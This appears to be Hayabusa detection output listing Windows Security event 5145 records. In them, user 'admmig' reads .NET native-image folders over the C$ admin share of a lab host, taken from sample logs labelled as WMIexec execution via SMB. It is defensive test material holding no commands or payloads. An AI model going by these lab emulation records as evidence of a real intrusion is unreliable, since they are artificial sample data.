20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 
